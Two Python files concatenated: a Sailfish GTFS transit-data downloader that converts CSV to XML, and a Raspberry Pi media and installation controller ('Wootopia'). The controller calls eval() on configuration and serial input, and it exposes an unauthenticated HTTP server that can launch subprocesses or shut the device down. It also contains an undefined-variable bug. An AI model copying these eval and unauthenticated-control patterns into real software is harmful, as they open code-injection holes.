# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Jolla Ltd nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# This file demonstrates how to write a class that downloads data from the
# net, does heavy processing or some other operation that takes a long time.
# To keep the UI responsive we do the operations in a separate thread and
# send status updates via signals.
import pyotherside
import threading
import time
import zipfile
import os
import urllib.request
def slow_function(path, ifile, ofile, country, city, static, version, selected_stops):
if not os.path.exists(path):
os.makedirs(path)
finfile = path + ifile
foutfile = path + ofile
#with zipfile.ZipFile(path + '209.zip') as myzip:
#with myzip.open('stops.txt', 'rU') as myfile:
#myfiles = myfile.read().decode('UTF-8'))
#print(myfile.read())
#for line in myfiles:
#line = line.replace('"','')
#row0 = line.split(",")
#pyotherside.send('message', row0[0], row0[2], row[3])
if ifile == "loaddata":
zip_source = static
zip_target = path + city + '.zip'
pyotherside.send('message', "Loaded", "all", "data!", zip_source, zip_target)
urllib.request.urlretrieve(zip_source, zip_target)
pyotherside.send('message', "Loaded", "all", "data!")
elif ifile == "unzip":
with zipfile.ZipFile(path + city + '.zip', 'r') as zip_ref:
zip_ref.extractall(path)
pyotherside.send('message', "Unzipped", "all", "data!")
elif ifile == "calendar.txt":
# delete files
if os.path.exists(path+"/"+city+".zip"):
pyotherside.send('message', "The", city, ".zip exist!")
os.remove(path+"/"+city+".zip")
if os.path.exists(path+ "shapes.txt"):
pyotherside.send('message', "The", "file shapes.txt", "exist!")
os.remove(path+ "shapes.txt")
if os.path.exists(path+ "agency.txt"):
pyotherside.send('message', "The", "file agency.txt", "exist!")
os.remove(path+ "agency.txt")
if os.path.exists(path+ "contracts.txt"):
pyotherside.send('message', "The", "file contracts.txt", "exist!")
os.remove(path+ "contracts.txt")
if os.path.exists(path+ "feed_info.txt"):
pyotherside.send('message', "The", "file feed_info.txt", "exist!")
os.remove(path+ "feed_info.txt")
if os.path.exists(path+ "transfers.txt"):
pyotherside.send('message', "The", "file transfers.txt", "exist!")
os.remove(path+ "transfers.txt")
if os.path.exists(path+ "translations.txt"):
pyotherside.send('message', "The", "file translations.txt", "exist!")
os.remove(path+ "translations.txt")
if os.path.exists(path+ "stops2.txt"):
pyotherside.send('message', "The", "file stops2.txt", "exist!")
os.remove(path+ "stops2.txt")
if os.path.exists(path+ "stops_old.txt"):
pyotherside.send('message', "The", "file stops_old.txt", "exist!")
os.remove(path+ "stops_old.txt")
#
linenumber = 0
with open (foutfile, 'w') as outfile:
with open (finfile) as infile:
outfile.write('<xml>\n')
for line in infile:
line = line.replace('"','')
if linenumber == 0:
row0 = line.split(",")
linenumber = 1
else:
outfile.write('<calendar>')
row = line.split(",")
outfile.write('<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>')
outfile.write('<' + row0[1] + '>' + row[1] + '</' + row0[1] + '>')
outfile.write('<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>')
outfile.write('<' + row0[3] + '>' + row[3] + '</' + row0[3] + '>')
outfile.write('<' + row0[4] + '>' + row[4] + '</' + row0[4] + '>')
outfile.write('<' + row0[5] + '>' + row[5] + '</' + row0[5] + '>')
outfile.write('<' + row0[6] + '>' + row[6] + '</' + row0[6] + '>')
outfile.write('<' + row0[7] + '>' + row[7] + '</' + row0[7] + '>')
outfile.write('<' + row0[8] + '>' + row[8] + '</' + row0[8] + '>')
outfile.write('<' + row0[9] + '>' + row[9] + '</' + row0[9] + '>')
outfile.write('</calendar>'+ '\n')
outfile.write('</xml>\n')
pyotherside.send('message', path, ifile, ofile, country, city)
if os.path.exists(path+ "calendar.txt"):
pyotherside.send('message', "The", "file calendar.txt", "exist!")
os.remove(path+ "calendar.txt")
ifile = "calendar_dates.txt"
ofile = "calendar_dates.xml"
finfile = path + ifile
foutfile = path + ofile
linenumber = 0
with open (foutfile, 'w') as outfile:
with open (finfile) as infile:
outfile.write('<xml>\n')
for line in infile:
line = line.replace('"','')
if linenumber == 0:
row0 = line.split(",")
linenumber = 1
else:
outfile.write('<calendar_dates>')
row = line.split(",")
outfile.write('<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>')
outfile.write('<' + row0[1] + '>' + row[1] + '</' + row0[1] + '>')
outfile.write('<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>')
outfile.write('</calendar_dates>'+ '\n')
outfile.write('</xml>\n')
pyotherside.send('message', path, ifile, ofile, country, city)
if os.path.exists(path+ "calendar_dates.txt"):
pyotherside.send('message', "The", "file calendar_dates.txt", "exist!")
os.remove(path+ "calendar_dates.txt")
ifile = "routes.txt"
ofile = "routes.xml"
finfile = path + ifile
foutfile = path + ofile
linenumber = 0
with open (foutfile, 'w') as outfile:
with open (finfile) as infile:
outfile.write('<xml>\n')
for line in infile:
line = line.replace('"','')
if linenumber == 0:
row0 = line.split(",")
linenumber = 1
else:
outfile.write('<routes>')
row = line.split(",")
outfile.write('<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>')
outfile.write('<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>')
outfile.write('<' + row0[3] + '>' + row[3] + '</' + row0[3] + '>')
outfile.write('</routes>'+ '\n')
outfile.write('</xml>\n')
pyotherside.send('message', path, ifile, ofile, country, city)
if os.path.exists(path+ "routes.txt"):
pyotherside.send('message', "The", "file routes.txt", "exist!")
os.remove(path+ "routes.txt")
ifile = "stops.txt"
ofile = "stops.xml"
finfile = path + ifile
foutfile = path + ofile
linenumber = 0
with open (foutfile, 'w') as outfile:
with open (finfile) as infile:
outfile.write('<xml>\n')
for line in infile:
line = line.replace('"','')
if linenumber == 0:
row0 = line.split(",")
linenumber = 1
elif version == '2.0':
outfile.write('<stop>')
row = line.split(",")
outfile.write('<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>')
outfile.write('<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>')
outfile.write('<' + row0[4] + '>' + row[4] + '</' + row0[4] + '>')
outfile.write('<' + row0[5] + '>' + row[5] + '</' + row0[5] + '>')
outfile.write('</stop>'+ '\n')
else:
outfile.write('<stop>')
row = line.split(",")
outfile.write('<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>')
outfile.write('<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>')
outfile.write('<' + row0[3] + '>' + row[3] + '</' + row0[3] + '>')
outfile.write('<' + row0[4] + '>' + row[4] + '</' + row0[4] + '>')
outfile.write('</stop>'+ '\n')
outfile.write('</xml>\n')
pyotherside.send('message', path, ifile, ofile, country, city, version)
if os.path.exists(path+ "stops.txt"):
pyotherside.send('message', "The", "file stops.txt", "exist!")
os.remove(path+ "stops.txt")
ifile = "trips.txt"
ofile = "trips.xml"
finfile = path + ifile
foutfile = path + ofile
linenumber = 0
with open (foutfile, 'w') as outfile:
with open (finfile) as infile:
outfile.write('<xml>\n')
for line in infile:
line = line.replace('"','')
if linenumber == 0:
row0 = line.split(",")
linenumber = 1
else:
outfile.write('<trips>')
row = line.split(",")
outfile.write('<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>')
outfile.write('<' + row0[1] + '>' + row[1] + '</' + row0[1] + '>')
outfile.write('<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>')
outfile.write('</trips>'+ '\n')
outfile.write('</xml>\n')
pyotherside.send('message', path, ifile, ofile, country, city)
if os.path.exists(path+ "trips.txt"):
pyotherside.send('message', "The", "file trips.txt", "exist!")
os.remove(path+ "trips.txt")
elif ifile == "stop_times.txt":
ifile = "stop_times.txt"
ofile = "stop_times.xml"
finfile = path + ifile
foutfile = path + ofile
linenumber = 0
savebatch = 0
batch = ''
batch_print = ''
with open (foutfile, 'w') as outfile:
with open (finfile) as infile:
outfile.write('<xml>\n')
for line in infile:
line = line.replace('"','')
if linenumber == 0:
row0 = line.split(",")
linenumber = 1
else:
row = line.split(",")
if row[4] == "1":
start_time = row[2]
if savebatch ==1:
batch_print = batch
batch = ''
savebatch = 0
if row[3] in selected_stops:
savebatch = 1
#pyotherside.send('message', "in stops", ifile, ofile, country, city)
batch+='<stoptime>'
batch+='<' + row0[0] + '>' + row[0] + '</' + row0[0] + '>'
batch+='<' + 'start_time' + '>' + start_time + '</' + 'start_time' + '>'
batch+='<' + row0[2] + '>' + row[2] + '</' + row0[2] + '>'
batch+='<' + row0[3] + '>' + row[3] + '</' + row0[3] + '>'
batch+='<' + row0[4] + '>' + row[4] + '</' + row0[4] + '>'
batch+='</stoptime>'+ '\n'
if batch_print != '':
outfile.write(batch_print)
batch_print = ''
#Ensuring the last batch printing, because batch_print doesnt't work for the last batch. Some extra data in file to ensure the functionality.
outfile.write(batch)
outfile.write('</xml>\n')
pyotherside.send('message', path, ifile, ofile, country, city)
if os.path.exists(path+ "stop_times.txt"):
pyotherside.send('message', "The", "file stop_times.txt", "exist!")
#os.remove(path+ "stop_times.txt")
else:
pyotherside.send('message', "path", "ifile", "ofile", "country", "city")
pyotherside.send('finished', 'Dataloading')
class Sloader:
def __init__(self):
# Set bgthread to a finished thread so we never
# have to check if it is None.
self.bgthread = threading.Thread()
self.bgthread.start()
def download(self, path, ifile, ofile, country, city, static, version, selected_stops):
self.path = path
self.ifile = ifile
self.ofile = ofile
self.country = country
self.city = city
self.static = static
self.version = version
self.selected_stops = selected_stops
if self.bgthread.is_alive():
return
self.bgthread = threading.Thread(target=slow_function, args=(self.path,self.ifile,self.ofile,self.country,self.city,self.static,self.version,self.selected_stops,))
self.bgthread.start()
sloader = Sloader()
|
Wootopia 1_6_6.py
|
# -*- coding: UTF-8 -*-
#!/usr/bin/env python3
# Version 1.6.6
# Imports pour le slider
from __future__ import absolute_import, division, print_function, unicode_literals
try:
import pi3d
except:
print("IMPORT Pi3D ERROR!")
pass
import os
import subprocess
import struct
import time
import random
import ast
import threading
# import pour le port série RS232
import serial
# Imports pour OMXplayer-wrapper
try:
from omxplayer.player import OMXPlayer
except:
print("IMPORT OMXPLAYER ERROR!")
pass
#import pour envois vers IP video player
import socket
# Imports pour input events (télécommande IR)
try:
import evdev, selectors
except:
print("IMPORT MODULE EVDEV ERROR!")
pass
# Imports pour parsing XML
import xml.etree.ElementTree as ET
# Imports pour GPIO
import RPi.GPIO as GPIO
# HTTP server:begin
from threading import Thread
from http.server import BaseHTTPRequestHandler, HTTPServer
class S(BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_response()
if self.path=='/':
with open("imeens.html","r") as f:
self.wfile.write(f.read().encode('utf-8'))
else:
self.wfile.write("GET request for {}".format(self.path).encode('utf-8'))
if self.path[1:] in Scenario["Evenements"]["http"]:
TraiteEvenement(Scenario["Evenements"]["http"][self.path[1:]])
def do_POST(self):
content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
post_data = self.rfile.read(content_length) # <--- Gets the data itself
print("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n",str(self.path), str(self.headers), post_data.decode('utf-8'))
self._set_response()
self.wfile.write("POST request for {}".format(self.path).encode('utf-8'))
def log_message(self, format, *args):
return
def run_http(server_class=HTTPServer, handler_class=S, port=8080):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
class http_listener(Thread):
def run(self):
run_http()
http_listener().start()
# HTTP server: end
# ouverture port RS232
try:
RS232=serial.Serial("/dev/ttyUSB0", baudrate = 9600, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=1)
RS232_ok=True
except:
print("RS232_1 NOT FOUND")
RS232_ok=False
pass
# reception port RS232
try:
RS232_receive=serial.Serial("/dev/ttyUSB0", baudrate = 9600,parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE,bytesize=serial.EIGHTBITS, timeout=1)
if (RS232_receive):
RS232_receive_ok=True
except:
RS232_receive_ok=False
pass
# ouverture port RS232_2
try:
RS232_2=serial.Serial("/dev/ttyUSB1", baudrate = 9600, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=1)
RS232_2_ok=True
except:
print("RS232_2 NOT FOUND")
RS232_2_ok=False
pass
# reception port RS232_2
try:
RS232_2_receive=serial.Serial("/dev/ttyUSB1", baudrate = 9600,parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE,bytesize=serial.EIGHTBITS, timeout=1)
if (RS232_2_receive):
RS232_2_receive_ok=True
except:
RS232_2_receive_ok=False
pass
Medias_path='medias'
GPIO.setmode(GPIO.BCM)
# numéros LED et GPIOs DMX - voir https://pinout.xyz/
# GPIO4 dispo sur CI V3 HAT
gpio_in4=4
# GPIO21 correspond a PCM DOUT pin40 dispo sur CI V3 HAT
led21=21
led22=22
# Attribution des PINS DMX - ne pas modifier ces valeurs
# GPIO 10 et 11 reserve Bus LED RVB
dmx0=26
dmx1=13
dmx2=16
dmx3=12
dmx4=6
dmx5=24
dmx6=23
GPIO.setup(gpio_in4, GPIO.IN)
#GPIO.setup(led21, GPIO.OUT)
#GPIO.setup(led22, GPIO.OUT)
GPIO.setup([dmx0,dmx1,dmx2,dmx3,dmx4,dmx5,dmx6], GPIO.OUT)
# Video input
PI3D_window_name="PI3Dwootopia"
VideoInput_window_name="ffplaywootopia"
VideoInputCommand="ffplay /dev/video0 -loop 0 -noborder -an -left 0 -top 0 -x 1280 -y 1024 -loglevel quiet -window_title " + VideoInput_window_name
# Imports pour skywriter
try :
import skywriter
except:
print('Avertissement : PAD non detecte')
pass
Debug=False
azerty_hid_codes = {
'a' : (0, 20), 'b' : (0, 5), 'c' : (0, 6), 'd' : (0, 7), 'e' : (0, 8), 'f' : (0, 9),
'g' : (0, 10), 'h' : (0, 11), 'i' : (0, 12), 'j' : (0, 13), 'k' : (0, 14), 'l' : (0, 15),
'm' : (0, 51), 'n' : (0, 17), 'o' : (0, 18), 'p' : (0, 19), 'q' : (0, 4), 'r' : (0, 21),
's' : (0, 22), 't' : (0, 23), 'u' : (0, 24), 'v' : (0, 25), 'w' : (0, 29), 'x' : (0, 27),
'y' : (0, 28), 'z' : (0, 26), '1' : (2, 30), '2' : (2, 31), '3' : (2, 32), '4' : (2, 33),
'5' : (2, 34), '6' : (2, 35), '7' : (2, 36), '8' : (2, 37), '9' : (2, 38), '0' : (2, 39),
'enter': (0, 40), '\b': (0, 42), 'escape': (0, 43), ' ' : (0, 44), '-' : (0, 35), '=' : (0, 46),
'[' : (64, 34), ']' : (64, 45), '\\': (64, 37), ';' : (0, 54), '\'': (64, 33), '`' : (64, 36),
',' : (0, 16), ':' : (0, 55), '/' : (2, 55), 'A' : (2, 20), 'B' : (2, 5), 'C' : (2, 6),
'D' : (2, 7), 'E' : (2, 8), 'F' : (2, 9), 'G' : (2, 10), 'H' : (2, 11), 'I' : (2, 12),
'J' : (2, 13), 'K' : (2, 14), 'L' : (2, 15), 'M' : (2, 51), 'N' : (2, 17), 'O' : (2, 18),
'P' : (2, 19), 'Q' : (2, 4), 'R' : (2, 21), 'S' : (2, 22), 'T' : (2, 23), 'U' : (2, 24),
'V' : (2, 25), 'W' : (2, 29), 'X' : (2, 27), 'Y' : (2, 28), 'Z' : (2, 26), '!' : (0, 56),
'@' : (64, 39), '#' : (64, 32), '$' : (0, 48), '%' : (32, 52), '^' : (64, 38), '&' : (0, 30),
'*' : (0, 49), '(' : (0, 34), ')' : (0, 45), '_' : (0, 37), '+' : (2, 46), '{' : (64, 33),
'}' : (64, 46), '|' : (64, 35), '.' : (2, 54), '"' : (0, 32), '~' : (64, 31), '<' : (0, 100),
'>' : (2, 100), '?' : (2, 16), 'Haut' : (0, 96), 'Bas' : (0, 90), 'Gauche' : (0, 92), 'Droite' : (0, 94)}
# Préparation input events (télécommande IR)
selector = selectors.DefaultSelector()
devices = [evdev.InputDevice(path) for path in evdev.list_devices()]
for device in devices:
if device.name=="HID 1d57:ad02 Consumer Control": IRconsumer = evdev.InputDevice(device.path)
if device.name=="HID 1d57:ad02 Keyboard": IRkeyboard = evdev.InputDevice(device.path)
try:
IRconsumer.grab() # accès exclusif au device (important pour éviter intéractions avec le système)
IRkeyboard.grab() # accès exclusif au device
selector.register(IRconsumer, selectors.EVENT_READ)
selector.register(IRkeyboard, selectors.EVENT_READ)
except:
pass
# variables globales du slider qui ne changent pas une fois initialisées
RepertoireMediaIni='/home/pi/Documents/Slider/medias.ini'
AllMedias = [] # liste de tous les objets Medias
categories=[] # Liste des noms de catégories
sous_categories=[] # Liste de listes de sous-catégories
# variables globales du slider qui dépendent du contexe, c'est à dire de la catégorie et de la sous catégorie sélectionnées
Medias=[] # Liste des médias de la catégorie (et éventuellement sous-catégorie) courante
NextMedias=[] # Liste des médias qui vont remplacer les anciens médias
cats=[] # Liste des textes pi3d des catégories
souscats=[] # Liste des textes pi3d des sous-catégories
cats2=[] # Pour l'affichage en haut à gauche : Liste des textes pi3d des catégories
souscats2=[] # Pour l'affichage en haut à gauche : Liste des textes pi3d des sous-catégories
slider_mode='selection' # mode a 3 valeurs possibles : selection / categorie / souscategorie
slider_visible=False
slider_stop=False
PAD_z=1.0
PAD_Actif=False
PAD_Timeout=-1
PAD_Timeout_Delay=200 # 2 secondes avant que le PAD soit considéré inactif
PAD_Transition_duree=10
PAD_Transition=-PAD_Transition_duree # activation de -PAD_Transition_duree à 0, désactivation de +PAD_Transition_duree à 0
PAD_seuil_detection=0.99
Slider_previously_selected_media=0
current_media=0
next_current_media=0
current_cat=0
current_souscat=-1
slider_action=''
move_steps=0 # à quelle étape en est la transition - technique utilisée pour le défilement des objets
nb_max_steps=10 # indique sur combien de frames s'effectue la transition
move_steps_media=0 # à quelle étape en est la transition des médias
move_steps_cat=0 # à quelle étape en est la transition des catégories
move_steps_souscat=0
# ********** Fonctions
Player=None
PlayedMediaId=None
MediaAssociations={}
MediaTimeline={}
IRremotePrevious=0
Sub=[]
def playerExit(exit_code):
global PlayedMediaId, PlaylistNext, MediaTimeline
mediaid=PlayedMediaId
PlayedMediaId=None
MediaAssociations={}
MediaTimeline={}
if PlaylistNext:
if Scenario["Medias"][mediaid]["mediasuivant"]=="random":
PlayMedia(random.choice(list(Scenario["Medias"])))
elif Scenario["Medias"][mediaid]["mediasuivant"]:
PlayMedia(Scenario["Medias"][mediaid]["mediasuivant"])
def PlayMedia(mediaid):
global Player, PlayedMediaId, MediaAssociations, MediaTimeline, Sub, PlaylistNext
PlayedMediaId=mediaid
PlaylistNext=True
if mediaid in Scenario["Medias"]:
MediaAssociations=Scenario["Medias"][mediaid]["associations"]
MediaTimeline=Scenario["Medias"][mediaid]["timeline"].copy()
# print(mediaid)
# print(MediaTimeline)
Mediafile = Medias_path + '/' + Scenario["Medias"][mediaid]["filename"]
if (os.path.isfile(Mediafile)):
Player=OMXPlayer(Mediafile,args=Scenario["Medias"][mediaid]["arguments"].split(' '))
# print(Scenario["Medias"][mediaid]["arguments"])
if Scenario["Medias"][mediaid]["positionecran"] is not None:
pos=Scenario["Medias"][mediaid]["positionecran"].split(',')
Player.set_video_pos(int(pos[0]),int(pos[1]),int(pos[2]),int(pos[3]))
else:
TerminateProcesses(Sub,None)
Player.exitEvent += lambda _, exit_code: playerExit(exit_code)
def TerminateProcesses(ProcessList,nom):
for p in ProcessList:
if nom==None or nom==p["nom"]:
if p["process"].poll()==None:
p["process"].stdin.write(ast.literal_eval("b'"+p["terminate"]+"'"))
p["process"].stdin.flush()
def Lance(actionid):
if Debug: print("*** actionid *** ",actionid)
global Player, PlayedMediaId, Sub, slider_visible, slider_mode, slider_stop, slider_timeout, Slider_previously_selected_media
global Medias, current_media, PlaylistNext, VideoInputProcess
global RS232, RS232_ok, RS232_2, RS232_2_ok
if actionid in Scenario["Actions"]:
Programme=Scenario["Actions"][actionid]["programme"]
Commande=Scenario["Actions"][actionid]["commande"]
if Programme=="Slider":
slider_timeout=SLIDER_TIMEOUT
if Commande=="SliderStart":
slider_visible=True
elif Commande=="SliderStop":
if Debug: print('slider_stop=True')
slider_stop=True
elif Commande=="SliderOnOff":
slider_visible = not slider_visible
elif Commande=="SliderActionSelection":
slider_visible = False
if Slider_previously_selected_media != current_media:
Lance(Medias[current_media].action)
Slider_previously_selected_media=current_media
elif Commande=="SliderLeft":
if slider_mode=="selection":
SliderGaucheSelection()
elif slider_mode=="categorie":
SliderAfficherSelection()
elif slider_mode=="souscategorie":
SliderAfficherCategories()
elif Commande=="SliderRight":
if slider_mode=="selection":
SliderDroiteSelection()
elif slider_mode=='categorie' and (len(sous_categories[current_cat]) > 1): # la catégorie contient plusieurs sous catégories
SliderAfficherSousCategories()
elif slider_mode=='categorie' and (len(sous_categories[current_cat]) <= 1): # la catégorie contient 0 ou 1 seule sous catégorie
SliderAfficherSelection()
elif slider_mode=='souscategorie':
SliderAfficherSelection()
elif Commande=="SliderUp":
if slider_mode=="selection":
SliderAfficherCategories()
elif slider_mode=="categorie":
SliderHautCategories()
elif slider_mode=="souscategorie":
SliderHautSousCategories()
elif Commande=="SliderDown":
if slider_mode=="categorie":
SliderBasCategories()
elif slider_mode=="souscategorie":
SliderBasSousCategories()
elif Commande=="SliderAfficherMedias":
slider_visible=True
SliderAfficherSelection()
elif Commande=="SliderAfficherCategories":
SliderAfficherCategories()
elif Commande=="SliderAfficherSousCategories":
SliderAfficherSousCategories()
elif Commande=="SliderDump": # Utilisé pour le débogage
SliderDump()
elif Programme=="PlayMedia":
PlayMedia(Commande)
elif Programme=="MediaControl":
if PlayedMediaId:
try:
if Commande=="Pause": Player.pause()
if Commande=="Desactive":
Player.hide_video()
Player.pause()
if Commande=="Active":
Player.play()
Player.show_video()
if Commande=="Resume": Player.play()
if Commande=="Stop": Player.quit()
if Commande=="StopAll":
PlaylistNext=False
Player.quit()
except:
pass
elif Programme=="LED21":
if Commande=="on": GPIO.output(led21, 1)
if Commande=="off": GPIO.output(led21, 0)
elif Programme=="LED22":
if Commande=="on": GPIO.output(led22, 1)
if Commande=="off": GPIO.output(led22, 0)
elif Programme[0:10]=="Subprocess":
Sub.append({'process':subprocess.Popen(Commande.split(' '), shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE),
'nom':Programme.split('|')[1],
'terminate':Programme.split('|')[2]})
elif Programme=="StopSubprocess":
TerminateProcesses(Sub,Commande)
elif Programme[0:13]=="IPvideoPlayer":
try:
IPvideoplayerSocket=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
IPvideoplayerSocket.connect((Programme.split('|')[1], int(Programme.split('|')[2]))) # Programme="IPvideoPlayer|TCP_IP|TCP_PORT"
#IPvideoplayerSocket.send(bytes(Commande.encode()))
IPvideoplayerSocket.send(eval('b"'+Commande+'"'))
IPvideoplayerSocket.close()
print("IP video Player IP:" + Programme.split('|')[1] + " port:" + Programme.split('|')[2] + " commande: " + Commande)
except:
print("IP video Player IP not connected!")
pass
elif Programme=="Clavier":
wantedChar=Commande
modif, key = azerty_hid_codes[wantedChar]
raw = struct.pack("BBBBL", modif, 0x00, key, 0x00, 0x00000000)
with open("/dev/hidg0", "wb") as f:
f.write(raw) # press key
f.write(struct.pack("Q", 0)) # release key
elif Programme=="CommandeDMX":
pins=list(str(bin(int(Commande)))[2:].zfill(7))
pins.reverse()
GPIO.output([dmx0,dmx1,dmx2,dmx3,dmx4,dmx5,dmx6],(int(pins[0]),int(pins[1]),int(pins[2]),int(pins[3]),int(pins[4]),int(pins[5]),int(pins[6])))
elif Programme=="Video_input":
if Commande=="Start":
# VideoInputProcess = subprocess.Popen(VideoInputCommand.split(' '),stdin=subprocess.PIPE,stdout=None,stderr=None,bufsize=0)
Sub.append({'process':subprocess.Popen(VideoInputCommand.split(' '), shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE),
'nom':'VideoInputProcess',
'terminate':"\033"})
os.system("sleep 5 && xdotool search --name " + PI3D_window_name + " windowraise")
elif Commande=="Stop":
# TerminateProcesses(Sub,'VideoInputProcess')
# VideoInputProcess.terminate()
os.system("xdotool search --name " + VideoInput_window_name + " key q")
elif Programme=="RS232":
if RS232_ok:
for commande_unitaire in Commande.split("|"):
RS232.write(bytes(commande_unitaire.encode()))
time.sleep(0.1)
else:
print('RS232 non disponible - commande ' + Commande + ' non transmise')
elif Programme=="RS232_2":
if RS232_2_ok:
for commande_unitaire in Commande.split("|"):
RS232_2.write(bytes(commande_unitaire.encode()))
time.sleep(0.1)
else:
print('RS232_2 non disponible - commande ' + Commande + ' non transmise')
elif Programme=="Shutdown":
slider_stop=True
GPIO.cleanup()
if RS232_ok:
RS232.close()
if RS232_2_ok:
RS232_2.close()
if Commande=="reboot":
os.system("reboot")
else:
os.system("shutdown now")
else:
if Debug: print(Scenario["Actions"][actionid])
else:
raise LookupError(actionid + " n'est pas une action connue")
def TraiteEvenement(eventid):
global MediaAssociations
if eventid in Scenario["Associations"]:
for actionid in Scenario["Associations"][eventid]:
Lance(actionid)
if eventid in MediaAssociations:
for actionid in MediaAssociations[eventid]:
Lance(actionid)
def telecommande_read(): # Telecommande Infrarouge
global IRremotePrevious
while not slider_stop:
for key, mask in selector.select():
device = key.fileobj
for event in device.read():
if Debug: print('event.type = ',event.type)
if event.type == 4:
if event.value == IRremotePrevious:
IRremotePrevious=0
else:
eventid=str(event.value)
print("Telecommande: "+eventid)
if eventid in Scenario["Evenements"]["Remote"]:
TraiteEvenement(Scenario["Evenements"]["Remote"][eventid])
else:
if Debug: print(eventid)
IRremotePrevious=event.value
SLIDER_TIMEOUT = 10000
# ********** Charge le fichier XML du scenario dans un dictionnaire
tree=ET.parse('Wootopia.xml')
root=tree.getroot()
Scenario={"Evenements":{},"Actions":{},"Associations":{},"Medias":{}}
for action in root.find("actions"):
Scenario["Actions"][action.attrib['actionid']]={
"programme":action.find('programme').text,
"commande":action.find('commande').text
}
for evenement in root.find("evenements"):
source=evenement.find('source').text
if (source=='Slider') and (evenement.attrib['evenementid']=='Slider_Timeout'): SLIDER_TIMEOUT=int(evenement.find('valeur').text)
if not source in Scenario["Evenements"]: Scenario["Evenements"][source]={}
Scenario["Evenements"][source][evenement.find('valeur').text]=evenement.attrib['evenementid']
for association in root.find("associations"):
if not association.find('evenement').text in Scenario["Associations"]:
Scenario["Associations"][association.find('evenement').text]=[]
Scenario["Associations"][association.find('evenement').text].append(association.find('action').text)
for media in root.find("medias"):
mediaid=media.attrib['mediaid']
Scenario["Medias"][mediaid]={
"filename":media.find('filename').text,
"positionecran":media.find('positionecran').text,
"arguments":media.find('arguments').text,
"mediasuivant":media.find('mediasuivant').text,
"associations":{},
"timeline":{}
}
for association in media.find("associations"):
if not association.find('evenement').text in Scenario["Medias"][mediaid]["associations"]:
Scenario["Medias"][mediaid]["associations"][association.find('evenement').text]=[]
Scenario["Medias"][mediaid]["associations"][association.find('evenement').text].append(association.find('action').text)
for event in media.find("timeline"):
if not event.find('seconds10').text in Scenario["Medias"][mediaid]["timeline"]:
Scenario["Medias"][mediaid]["timeline"][event.find('seconds10').text]=[]
Scenario["Medias"][mediaid]["timeline"][event.find('seconds10').text].append(event.find('action').text)
# ********** RS232 receive
def RS232receiveThread():
if RS232_receive_ok and "RS232_receive" in Scenario["Evenements"]:
while RS232_receive:
RS232_line=RS232_receive.readline()
if RS232_line:
for RS232_receive_expected in Scenario["Evenements"]["RS232_receive"]:
if eval(RS232_receive_expected) == RS232_line:
print("Reception RS232 correspondant à l'événement " + RS232_receive_expected)
TraiteEvenement(Scenario["Evenements"]["RS232_receive"][RS232_receive_expected])
else:
print("Reception RS232 " + RS232_receive_expected + " (aucun événement ne correspond)")
#threading.Thread(target=RS232receiveThread).start()
class RS232_listener(Thread):
def run(self):
RS232receiveThread()
RS232_listener().start()
# ********** RS232_2 receive
def RS232_2receiveThread():
if RS232_2_receive_ok and "RS232_2_receive" in Scenario["Evenements"]:
while RS232_2_receive:
RS232_line=RS232_2_receive.readline()
if RS232_2_line:
for RS232_2_receive_expected in Scenario["Evenements"]["RS232_2_receive"]:
if eval(RS232_2_receive_expected) == RS232_2_line:
print("Reception RS232_2 correspondant à l'événement " + RS232_2_receive_expected)
TraiteEvenement(Scenario["Evenements"]["RS232_2_receive"][RS232_2_receive_expected])
else:
print("Reception RS232_2 " + RS232_2_receive_expected + " (aucun événement ne correspond)")
#threading.Thread(target=RS232receiveThread).start()
class RS232_2_listener(Thread):
def run(self):
RS232_2receiveThread()
RS232_2_listener().start()
# ********** GPIO
def GPIO_DOWN(channel):
if (channel==4):
TraiteEvenement(Scenario["Evenements"]["GPIO_DOWN"]["4"])
if "GPIO_DOWN" in Scenario["Evenements"]:
